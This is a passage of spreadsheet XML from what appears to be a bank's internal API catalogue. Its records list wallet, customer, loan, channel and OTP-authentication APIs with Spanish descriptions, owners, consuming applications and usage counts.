    <n v="1"/>
    <n v="1"/>
    <m/>
    <m/>
    <m/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-11-10T14:42:32"/>
    <s v="Tec - Wallet Channel Customers"/>
    <n v="122"/>
    <s v="Tec - Wallet Channel Customers - Customer Cards"/>
    <n v="102"/>
    <x v="427"/>
    <s v="Con esta API se permitirá consultar la información de registro de un cliente en la Nueva Billetera."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Servicios Transaccionales MP"/>
    <x v="15"/>
    <s v="Productor"/>
    <s v="Aceptación"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <m/>
    <s v="MascaraTransaccional_NU0021001"/>
    <n v="116"/>
    <n v="128"/>
    <m/>
    <m/>
    <m/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-05-26T14:29:33"/>
    <s v="Tec - Wallet Channel Customers"/>
    <n v="122"/>
    <s v="Tec - Wallet Channel Customers - Customer Enrollment"/>
    <n v="101"/>
    <x v="428"/>
    <s v="Con esta API se permitirá consultar la información de las tarjetas de los clientes registradas en la Nueva Billetera. La búsqueda se puede realizar por los datos de identificación del cliente, el identificador de la billetera (wallet ID), o el identificador de la tarjeta en la billetera (card ID). "/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Servicios Transaccionales MP"/>
    <x v="15"/>
    <s v="Productor"/>
    <s v="Aceptación"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <m/>
    <s v="MascaraTransaccional_NU0021001"/>
    <n v="14"/>
    <n v="10"/>
    <m/>
    <m/>
    <m/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-05-26T14:29:33"/>
    <s v="Tec - Wallet Channel Customers"/>
    <n v="122"/>
    <s v="Tec - Wallet Channel Customers  Customer Enrollment History"/>
    <n v="101"/>
    <x v="429"/>
    <s v="Con esta API se permitirá consultar la información histórica de registro de los clientes en la nueva billetera. Tiene la opción de consultar la información histórica de un cliente (Todas las billeteras que ha tenido), o la consulta de todos los clientes registrados en el canal."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Servicios Transaccionales MP"/>
    <x v="15"/>
    <s v="Productor"/>
    <s v="Aceptación"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <m/>
    <s v="MascaraTransaccional_NU0021001"/>
    <n v="112"/>
    <n v="128"/>
    <m/>
    <m/>
    <m/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-11-10T14:42:32"/>
    <s v="Tec - Wallet Channel Customers"/>
    <n v="122"/>
    <s v="Tec - Wallet Customers - Customer Purchases"/>
    <n v="103"/>
    <x v="430"/>
    <s v="Esta API permite consultar las compras realizadas por los clientes a través de la Nueva Billetera con las tecnologí­as habilitadas para pagos. â€¢_x0009_QR â€¢_x0009_NFC (Sólo se habilitará cuando se puedan realizar pagos con NFC)"/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Servicios Transaccionales MP"/>
    <x v="15"/>
    <s v="Productor"/>
    <s v="Aceptación"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <m/>
    <s v="MascaraTransaccional_NU0021001"/>
    <n v="49"/>
    <n v="39"/>
    <m/>
    <m/>
    <m/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-05-26T14:29:33"/>
    <s v="Tec - Wallet Channel Customers"/>
    <n v="122"/>
    <s v="Tec - Wallet Customers - Wallet Customers Management"/>
    <n v="100"/>
    <x v="431"/>
    <s v="Esta API permite exponer las diferentes capacidades para gestionar los clientes en la billetera móvil. Inicialmente, la API tendrá las siguientes capacidades: â€¢_x0009_Bloquear o desbloquear por seguridad una billetera de un cliente â€¢_x0009_Cancelar definitivamente la billetera si el cliente así­ lo solicita o cuando el área de seguridad detecte una vulnerabilidad (fraude confirmado o movimientos inusuales)."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Servicios Transaccionales MP"/>
    <x v="15"/>
    <s v="Productor"/>
    <s v="Aceptación"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <m/>
    <s v="MascaraTransaccional_NU0021001"/>
    <m/>
    <n v="1"/>
    <m/>
    <m/>
    <m/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-10-28T14:41:21"/>
    <s v="Tec-Business Opportunities"/>
    <n v="144"/>
    <s v="Tec-Branch Commercial Team"/>
    <n v="102"/>
    <x v="432"/>
    <s v="La Api ofrece a los consumidores, la capacidad de obtener la información de los códigos CIF y CRM del equipo comercial de una sucursal, es decir: su gerente, los asesores o vendedores y la identificación o código de la sucursal."/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <x v="5"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <s v="ConsultaDatosComercialesSucursal/V1.0"/>
    <s v="SAP CRM_AW0682001"/>
    <s v="BC_Herramientas_MonitoreoPrd _x000d__x000a_ VisorInteractivo_AW1249"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-10-19T14:12:15"/>
    <s v="Tec-Business Opportunities"/>
    <n v="144"/>
    <s v="Tec-Business Opportunities - SME Generals Inquiry"/>
    <n v="101"/>
    <x v="433"/>
    <s v="La Api ofrece a los consumidores, la capacidad de obtener la información general de las oportunidades comerciales del segmento personas y Pyme a la carta, que resultan de los modelos analí­ticos del banco y que se entregan a la LZ."/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <x v="5"/>
    <s v="Productor"/>
    <s v="Oportunidades comerciales (STOC)"/>
    <s v="Natalia Andrea Rodas"/>
    <m/>
    <m/>
    <s v="BC_Herramientas_MonitoreoPrd _x000d__x000a_ VisorInteractivo_AW1249"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-11-04T08:57:04"/>
    <s v="Tec-Business Opportunities"/>
    <n v="144"/>
    <s v="Tec-Business Opportunities - SME Management"/>
    <n v="102"/>
    <x v="434"/>
    <s v="La API tiene la gestion de las oportunidades comerciales pyme."/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <x v="5"/>
    <s v="Productor"/>
    <s v="Oportunidades comerciales (STOC)"/>
    <s v="Natalia Andrea Rodas"/>
    <m/>
    <m/>
    <s v="BC_Herramientas_MonitoreoPrd _x000d__x000a_ VisorInteractivo_AW1249"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-10-28T14:41:21"/>
    <s v="Tec-Business Opportunities"/>
    <n v="144"/>
    <s v="Tec-Business Opportunities - SME PreApproved Inquiry"/>
    <n v="101"/>
    <x v="435"/>
    <s v="La Api ofrece a los consumidores, la capacidad de obtener la información general de las oportunidades comerciales de pre- aprobados de los clientes del segmento pyme, para pymes con estados financieros y preaprobados para pymes sin estados financieros, la api proporciona un método para cada grupo."/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <x v="5"/>
    <s v="Productor"/>
    <s v="Oportunidades comerciales (STOC)"/>
    <s v="Natalia Andrea Rodas"/>
    <m/>
    <m/>
    <s v="BC_Herramientas_MonitoreoPrd _x000d__x000a_ VisorInteractivo_AW1249"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-10-22T16:48:13"/>
    <s v="Tec-Business Opportunities"/>
    <n v="144"/>
    <s v="Tec-Business Opportunities MasterData"/>
    <n v="101"/>
    <x v="436"/>
    <s v="La Api ofrece a los consumidores, la capacidad de obtener la informacion general de los catalogos."/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <x v="5"/>
    <s v="Productor"/>
    <s v="Oportunidades comerciales (STOC)"/>
    <s v="Natalia Andrea Rodas"/>
    <m/>
    <m/>
    <s v="BC_Herramientas_MonitoreoPrd _x000d__x000a_ VisorInteractivo_AW1249"/>
    <m/>
    <m/>
    <n v="5271"/>
    <n v="7652"/>
    <m/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-10-19T14:12:15"/>
    <s v="Tec-Business Opportunities"/>
    <n v="144"/>
    <s v="Tec-Business Opportunities Persons - Generals"/>
    <n v="101"/>
    <x v="437"/>
    <s v="La API permite consultar las oportunidades comerciales del segmento personas, de un cliente en particular."/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <x v="5"/>
    <s v="Productor"/>
    <s v="Oportunidades comerciales (STOC)"/>
    <s v="Natalia Andrea Rodas"/>
    <m/>
    <m/>
    <s v="BC_Herramientas_MonitoreoPrd _x000d__x000a_ VisorInteractivo_AW1249"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-11-04T08:57:04"/>
    <s v="Tec-Business Opportunities"/>
    <n v="144"/>
    <s v="Tec-Business Opportunities Persons - Management"/>
    <n v="102"/>
    <x v="438"/>
    <s v="La API tiene la gestion de las oportunidades comerciales personas."/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <x v="5"/>
    <s v="Productor"/>
    <s v="Oportunidades comerciales (STOC)"/>
    <s v="Natalia Andrea Rodas"/>
    <m/>
    <m/>
    <s v="BC_Herramientas_MonitoreoPrd _x000d__x000a_ VisorInteractivo_AW1249"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-10-19T14:12:15"/>
    <s v="Tec-Business Opportunities"/>
    <n v="144"/>
    <s v="Tec-Business Opportunities Persons-Preapproved"/>
    <n v="101"/>
    <x v="439"/>
    <s v="La API permite consultar los pre-aprobados del segmento personas, de un cliente en particular."/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <x v="5"/>
    <s v="Productor"/>
    <s v="Oportunidades comerciales (STOC)"/>
    <s v="Natalia Andrea Rodas"/>
    <m/>
    <m/>
    <s v="BC_Herramientas_MonitoreoPrd _x000d__x000a_ VisorInteractivo_AW1249"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-03-17T09:52:32"/>
    <s v="Tec-Channels"/>
    <n v="101"/>
    <s v="Tec-Channel - Service Points"/>
    <n v="101"/>
    <x v="440"/>
    <s v="El API de puntos de servicios permite realizar la consulta de los siguientes puntos de servicios del banco: Sucursales, Cajeros, corresponsales Bancarios. Esta consulta se realiza de acuerdo a la posición geográfica (Latitud y longitud)."/>
    <s v="CANALES_TRADICIONALES"/>
    <s v="Servicios Switch y Telefonica"/>
    <x v="16"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="BC_Herramientas_MonitoreoPrd _x000d__x000a_ BALMTEC_AW0955 _x000d__x000a_ BCHerramientasMonitoreoPrd2 _x000d__x000a_ TABOT_AW1165001 _x000d__x000a_ NEQUIMAPAS_AW1011"/>
    <n v="182495"/>
    <n v="125921"/>
    <n v="730283"/>
    <n v="1167112"/>
    <n v="1166640"/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-09-21T14:03:38"/>
    <s v="Tec-Channels"/>
    <n v="200"/>
    <s v="Tec-Channel - Service Points"/>
    <n v="200"/>
    <x v="440"/>
    <s v="El API de puntos de servicios permite realizar la consulta de los siguientes puntos de servicios del banco: Sucursales, Cajeros, corresponsales Bancarios. Esta consulta se realiza de acuerdo a la posición geográfica (Latitud y longitud)."/>
    <s v="CANALES_TRADICIONALES"/>
    <s v="Servicios Switch y Telefonica"/>
    <x v="16"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <s v="GeorreferenciacionAPI"/>
    <s v="HabitatCore_AW1281003 _x000d__x000a_ JornadaPagos_AW1316001"/>
    <n v="2672"/>
    <n v="3942"/>
    <n v="11224"/>
    <n v="23126"/>
    <n v="16913"/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-11-24T16:10:50"/>
    <s v="Tec-Commerce Portal"/>
    <n v="160"/>
    <s v="Tec-Commerce portal - Transaction Log"/>
    <n v="140"/>
    <x v="441"/>
    <s v="Esta API permitirá exponer las diferentes consultas que desde el canal portal comercio se requieren para la administración del canal desde el Modulo Administrativo u otros canales o consumidores que requieran acceder a la información del canal y a sus diferentes funcionalidades."/>
    <s v="CANALES_Y_CONTENIDOS_DIGITALES_PYMES"/>
    <s v="Portal Comercio"/>
    <x v="6"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="Modulo Administrativo Canales Digitales_AW1204 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <m/>
    <m/>
    <n v="1635"/>
    <n v="2540"/>
    <n v="1541"/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2019-11-13T01:27:18"/>
    <s v="Tec - Customer"/>
    <n v="121"/>
    <s v="Tec-Customer - Amount Limit Management"/>
    <n v="101"/>
    <x v="442"/>
    <s v="Esta API permite gestionar los topes que tiene un cliente. Los topes indican la cantidad de dinero que puede debitar dicho cliente durante el dí­a o mes según sea el caso. Para esto, el servicio permitirá consultar el monto lí­mite establecido por el cliente desde la sucursal virtual personas o los montos establecidos por el banco y permitirá tener un acumulado de las transacciones hechas por el cliente durante el dí­a para poder determinar hasta qué momento puede debitarse de sus cuentas."/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <x v="6"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <s v="GestionDeTopesMontosClientes/V1.0"/>
    <s v="PCC - Programas Comunes Canales_Generación y validación de pines_ISPCC0008"/>
    <s v="BC_Herramientas_Monitoreo _x000d__x000a_ BC_Herramientas_MonitoreoPrd _x000d__x000a_ TMP Boton Bancolombia_BDT _x000d__x000a_ GestionaNegocios_AW1302001 _x000d__x000a_ PortalSalaDeVentas_AW1258002 _x000d__x000a_ plink_AW1206001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ PORTALCOBRANZA_AW1294001 _x000d__x000a_ APM_NU0032001 _x000d__x000a_ LifeCoach_AW1240001 _x000d__x000a_ CapaGestionCanal_NU0014001 _x000d__x000a_ Recargas_AW1300001 _x000d__x000a_ TabotWhatsapp_AW1165 _x000d__x000a_ MarketplaceEcosistemasPersonas_NU0035001 _x000d__x000a_ NEQUIMDM_AW1011 _x000d__x000a_ creditlens_NU0038001 _x000d__x000a_ MovilidadCore_AW1281002 _x000d__x000a_ HabitatCore_AW1281003"/>
    <n v="17915"/>
    <n v="13548"/>
    <n v="106570"/>
    <n v="158841"/>
    <n v="180854"/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2019-10-29T11:59:52"/>
    <s v="Tec - Customer"/>
    <n v="121"/>
    <s v="Tec-Customer - Basic Information"/>
    <n v="101"/>
    <x v="443"/>
    <s v="La Api Tec-Customer - Basic Information permite la consulta de información Basica de un cliente sea persona natural o jurí­dica."/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <x v="17"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco"/>
    <s v="RecuperarDatosCliente/V4.0"/>
    <s v="MDM"/>
    <s v="BC_Herramientas_Monitoreo _x000d__x000a_ BC_Herramientas_MonitoreoPrd _x000d__x000a_ TMP Boton Bancolombia_BDT _x000d__x000a_ GestionaNegocios_AW1302001 _x000d__x000a_ PortalSalaDeVentas_AW1258002 _x000d__x000a_ plink_AW1206001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ PORTALCOBRANZA_AW1294001 _x000d__x000a_ APM_NU0032001 _x000d__x000a_ LifeCoach_AW1240001 _x000d__x000a_ CapaGestionCanal_NU0014001 _x000d__x000a_ Recargas_AW1300001 _x000d__x000a_ TabotWhatsapp_AW1165 _x000d__x000a_ MarketplaceEcosistemasPersonas_NU0035001 _x000d__x000a_ NEQUIMDM_AW1011 _x000d__x000a_ creditlens_NU0038001 _x000d__x000a_ MovilidadCore_AW1281002 _x000d__x000a_ HabitatCore_AW1281003"/>
    <m/>
    <m/>
    <n v="1749"/>
    <n v="2539"/>
    <n v="1545"/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2019-11-14T15:57:28"/>
    <s v="Customer Sufi"/>
    <n v="100"/>
    <s v="Tec-Customer Data Sufi - Management"/>
    <n v="100"/>
    <x v="444"/>
    <s v="API para la gestión de obligaciones Sufi"/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <x v="11"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2019-11-14T15:57:28"/>
    <s v="Customer Sufi"/>
    <n v="100"/>
    <s v="Tec-Customer Data Sufi - Retrieve"/>
    <n v="100"/>
    <x v="445"/>
    <s v="API para consulta de datos generales Sufi"/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <x v="11"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-10-21T19:49:43"/>
    <s v="Products"/>
    <n v="110"/>
    <s v="Tec-Customer Products Natural Person"/>
    <n v="110"/>
    <x v="446"/>
    <s v="La Api ofrece a los consumidores, la capacidad de obtener la información de los productos que posee un cliente en el banco."/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <x v="5"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <s v="ConsultaProductosClientePersonas/V1.0"/>
    <m/>
    <s v="PORTALCOBRANZA_AW1294001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="194"/>
    <n v="62"/>
    <m/>
    <m/>
    <m/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2019-11-18T09:18:16"/>
    <s v="Tec-Accounts"/>
    <n v="110"/>
    <s v="Tec-Deposit-Accounts"/>
    <n v="100"/>
    <x v="447"/>
    <s v="Services that allows get information about deposit accounts"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="2"/>
    <s v="Productor Transversal"/>
    <s v="Depósitos"/>
    <s v="Leidy Yurany Guarin Lopez"/>
    <s v="ConsultaExtendidaDeSaldos/V1.0_x000a_ConsultaMovimientoDepositos/V1.0_x000a_ConsultaSaldosCuentasDepositos/V3.0"/>
    <s v="Cuentas AFC_AW1110001"/>
    <s v="GestionaNegocios_AW1302001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd _x000d__x000a_ NEQUICUEDEP_AW1011 _x000d__x000a_ EDPYME_AW1170 _x000d__x000a_ CapaGestionCanal_NU0014001 _x000d__x000a_ PORTALCOBRANZA_AW1294001"/>
    <n v="141850"/>
    <n v="104322"/>
    <n v="644396"/>
    <n v="1004509"/>
    <n v="1051208"/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2019-11-06T17:58:04"/>
    <s v="Tec-Devices"/>
    <n v="100"/>
    <s v="Tec-Device - Authenticate Customer OTP"/>
    <n v="100"/>
    <x v="448"/>
    <s v="Para la autenticación fuerte en los canales virtuales se utiliza OTP (One Time Password), esta es una tecnologí­a que provee una contraseña de una sola vida, la cual es provista por un producto llamado Detect ID. El servicio AutenticarClienteOTP permite la validación de un OTP generado a un cliente desde la plataforma de clave dinámica Detect ID."/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <x v="10"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <s v="AutenticarClienteOTP/V2.0"/>
    <m/>
    <s v="TMP EDIN APP_AW1276001 _x000d__x000a_ BC_Herramientas_Monitoreo _x000d__x000a_ App inversionesGB_AW1185001"/>
    <n v="701"/>
    <n v="736"/>
    <m/>
    <m/>
    <m/>
    <s v="API Pro FE"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2019-11-06T17:58:04"/>
    <s v="Tec-Devices"/>
    <n v="100"/>
    <s v="Tec-Devices - Enroll Customer OTP"/>
    <n v="100"/>
    <x v="449"/>
    <s v="Para la autenticación fuerte en los canales virtuales se utiliza OTP (One Time Password), esta es una tecnologí­a que provee una contraseña de una sola vida, la cual es provista por un producto llamado Detect ID, para poder hacer uso de este es necesario enrolarse o matricularse, para eso se expone esta API â€œEnroll Customer OTPâ€?.  La cual permite iniciar el registro de un dispositivo móvil para un cliente especí­fico, enviando un código de activación por el mecanismo definido en DetectID. Este código de activación permitirá vincular el dispositivo móvil. Este código se genera a partir de las configuraciones definidas del canal especificado; sin embargo, una vez que el código de activación es empleado, el dispositivo será registrado en todos los canales, es decir, si un usuario es asociado a otro canal, podrá utilizar su mismo dispositivo sin registrarlo nuevamente. Existen 3 posibles formas de usar este OTP, por Softoken, SMS o email (estos últimos dos son conocidos como ODA), de acuerdo al mecanismo que se desee utilizar es necesario matricularse de forma particular en ese."/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <x v="10"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <s v="EnrolarClienteOTP/V2.0"/>
    <m/>
    <s v="TMP EDIN APP_AW1276001 _x000d__x000a_ BC_Herramientas_Monitoreo _x000d__x000a_ App inversionesGB_AW1185001"/>
    <n v="282"/>
    <n v="350"/>
    <m/>
    <m/>
    <m/>
    <s v="API Pro FE"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-03-02T16:27:39"/>
    <s v="Tec-Edpyme channel"/>
    <n v="100"/>
    <s v="Tec-Edpyme channel - customer information"/>
    <n v="100"/>
    <x v="450"/>
    <s v="Esta API permitirá exponer las diferentes consultas que desde el canal Edpyme se requieren para la administración del canal desde el Modulo Administrativo u otros canales o consumidores que requieran hacer uso de estas funcionalidades"/>
    <s v="CANALES_Y_CONTENIDOS_DIGITALES_PYMES"/>
    <s v="Canales Pymes"/>
    <x v="23"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="Modulo Administrativo Canales Digitales_AW1204"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Technical Parameters"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Servicio para la gestión de parámetros técnicos de la plataforma D2B"/>
    <s v="Transf_y_Soporte_Distribución_Digital"/>
    <s v="Distribucion Digital"/>
    <x v="13"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="AW1204001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-03-17T12:08:19"/>
    <s v="Tec-Investments Channel"/>
    <n v="111"/>
    <s v="Tec-Investments Channel - customer information"/>
    <n v="100"/>
    <x v="451"/>
    <s v="Esta API permitirá exponer las diferentes consultas relacionadas con la información de un cliente del canal de inversiones y de esta manera permitir la administración desde el Módulo Administrativo u otros consumidores."/>
    <s v="CANALES_Y_CONTENIDOS_DIGITALES_PYMES"/>
    <s v="Canales Pymes"/>
    <x v="19"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="Modulo Administrativo Canales Digitales_AW1204 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="69"/>
    <n v="95"/>
    <n v="488"/>
    <n v="676"/>
    <n v="1122"/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-06-26T11:33:09"/>
    <s v="Tec-Investments Channel"/>
    <n v="111"/>
    <s v="Tec-Investments Channel - Customers Management"/>
    <n v="201"/>
    <x v="452"/>
    <s v="Esta API permite exponer las capacidades para gestionar los clientes en los diferentes canales del banco"/>
    <s v="CANALES_Y_CONTENIDOS_DIGITALES_PYMES"/>
    <s v="Canales Pymes"/>
    <x v="19"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <s v="PCC - Programas Comunes Canales_Generación y validación de pines_ISPCC0008"/>
    <s v="Modulo Administrativo Canales Digitales_AW1204 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="1"/>
    <n v="1"/>
    <n v="2"/>
    <n v="2"/>
    <n v="5"/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-01-17T12:14:33"/>
    <s v="Tec - Loans"/>
    <n v="151"/>
    <s v="Tec-Loans  Agreements Enquiry"/>
    <n v="101"/>
    <x v="453"/>
    <s v="Esta API expone métodos que permiten la consulta datos básicos de convenios empresariales de cartera los cuales pueden ser de libranza, seguros, DAI, ONGs o fundaciones, etc"/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <x v="0"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <s v="AdministracionConveniosCartera/V1.0"/>
    <s v="Bankvision - BVL_Cartera moneda legal y extranjera_ISBVL0001"/>
    <s v="BC_Herramientas_MonitoreoPrd _x000d__x000a_ BALMTEC_AW0955 _x000d__x000a_ PORTALCOBRANZA_AW1294001 _x000d__x000a_ PortalLibranzas_AW0360007"/>
    <n v="298"/>
    <n v="200"/>
    <n v="1421"/>
    <n v="2520"/>
    <n v="2383"/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2019-10-24T09:21:51"/>
    <s v="Tec - Loans"/>
    <n v="151"/>
    <s v="Tec-Loans Customer Information"/>
    <n v="100"/>
    <x v="454"/>
    <s v="El API tiene como objetivo permitir la consulta detallada de un préstamo asociada a un cliente"/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <x v="0"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <s v="ConsultaInformacionPrestamos/V1.0"/>
    <s v="STI - Sistema Transaccional de Integración_Sistema Transaccional de Integración_ISSTI0002"/>
    <s v="BC_Herramientas_MonitoreoPrd _x000d__x000a_ BALMTEC_AW0955 _x000d__x000a_ PORTALCOBRANZA_AW1294001 _x000d__x000a_ PortalLibranzas_AW0360007"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-09-08T08:40:41"/>
    <s v="Loans Sufi"/>
    <n v="100"/>
    <s v="Tec-Loans Sufi Management"/>
    <n v="100"/>
    <x v="455"/>
    <s v="API para acceder a las operaciones asociadas a la administración de las obligaciones de un cliente de suf"/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <x v="11"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <m/>
    <s v="MarketplaceEcosistemasPersonas_NU0035001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-09-08T08:40:41"/>
    <s v="Loans Sufi"/>
    <n v="100"/>
    <s v="Tec-Loans Sufi Retrievet"/>
    <n v="100"/>
    <x v="456"/>
    <s v="API para la consulta de obligaciones Sufi"/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <x v="11"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <m/>
    <s v="MarketplaceEcosistemasPersonas_NU0035001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-04-21T11:54:58"/>
    <s v="Tec-Mortgage Loans"/>
    <n v="101"/>
    <s v="Tec-Mortgage Loans  Obligations"/>
    <n v="101"/>
    <x v="457"/>
    <s v="En su versión inicial, esta API expone una capacidad que permite realizar consultas detalladas para obligaciones hipotecarias, a partir del numero de la obligacion."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Hipotecario"/>
    <x v="21"/>
    <s v="Productor"/>
    <s v="Hipotecario"/>
    <s v="Martha Luz Pardo"/>
    <s v="ObligacionesHipotecario/V1.0"/>
    <m/>
    <s v="PORTALCOBRANZA_AW1294001"/>
    <n v="11"/>
    <n v="3"/>
    <n v="39"/>
    <n v="641"/>
